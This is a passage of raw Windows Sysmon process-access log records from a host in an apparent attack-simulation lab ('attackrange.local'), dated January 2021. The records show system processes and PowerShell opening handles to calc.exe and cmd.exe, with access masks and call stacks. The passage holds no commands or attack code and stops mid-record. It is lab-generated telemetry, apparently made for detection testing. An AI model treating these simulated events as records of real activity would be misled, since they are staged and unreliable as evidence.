22:13:28.304{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b603-000000001100}8876C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000361782Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.304{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b603-000000001100}8876C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000361781Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.304{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b603-000000001100}8876C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000361780Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.304{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b603-000000001100}8876C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000361779Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.304{8e433fbf-337e-6013-9402-000000001100}75848948C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e023|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+25de9|C:\Windows\System32\ApplicationFrame.dll+6106|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+a833|C:\Windows\SYSTEM32\ntdll.dll+32f13|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361778Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.304{8e433fbf-337e-6013-9402-000000001100}75848948C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e227|C:\Windows\System32\twinapi.appcore.dll+2dfdd|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+25de9|C:\Windows\System32\ApplicationFrame.dll+6106|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+a833|C:\Windows\SYSTEM32\ntdll.dll+32f13|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361777Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.304{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b603-000000001100}8876C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000361776Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.304{8e433fbf-3433-6013-2303-000000001100}92689624C:\Windows\system32\conhost.exe{8e433fbf-3708-6013-b703-000000001100}6088C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\system32\conhost.exe+1260d|C:\Windows\system32\conhost.exe+12505|C:\Windows\system32\conhost.exe+895c|C:\Windows\system32\conhost.exe+f2e6|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361775Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.304{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b603-000000001100}8876C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000361774Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.304{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b603-000000001100}8876C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000361773Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.304{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b603-000000001100}8876C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000361772Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.304{8e433fbf-337a-6013-7e02-000000001100}63045600C:\Windows\system32\ctfmon.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\MSCTF.dll+328e0|C:\Windows\System32\MSCTF.dll+31adc|C:\Windows\System32\MSCTF.dll+3176f|C:\Windows\System32\MSCTF.dll+315d2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361771Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.304{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b603-000000001100}8876C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000361770Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.304{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b603-000000001100}8876C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000361769Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.304{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b603-000000001100}8876C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000361768Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.304{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b603-000000001100}8876C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000361767Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.304{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b603-000000001100}8876C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000361766Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.304{8e433fbf-3433-6013-2203-000000001100}66805812C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{8e433fbf-3708-6013-b703-000000001100}6088C:\Windows\system32\cmd.exe0x1f3fffC:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\76c2318d9c3680627b8a4a680bb84f48\System.ni.dll+381f60|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\76c2318d9c3680627b8a4a680bb84f48\System.ni.dll+2fa12e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\76c2318d9c3680627b8a4a680bb84f48\System.ni.dll+2f8cd5|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\76c2318d9c3680627b8a4a680bb84f48\System.ni.dll+2c3b1e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\76c2318d9c3680627b8a4a680bb84f48\System.ni.dll+2c01f5|UNKNOWN(00007FFC8F2B5DD3) 10341000x8000000000000000361765Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.304{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b603-000000001100}8876C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000361764Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.304{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b603-000000001100}8876C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000361763Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.304{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b603-000000001100}8876C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000361762Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.304{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+111b6|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361761Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.304{8e433fbf-36df-6013-a003-000000001100}13126096C:\Windows\system32\svchost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|c:\windows\system32\capabilityaccessmanager.dll+29d07|c:\windows\system32\capabilityaccessmanager.dll+1ca30|c:\windows\system32\capabilityaccessmanager.dll+e9a1|c:\windows\system32\capabilityaccessmanager.dll+955f|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a 10341000x8000000000000000361760Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.304{8e433fbf-36df-6013-a003-000000001100}13126096C:\Windows\system32\svchost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program 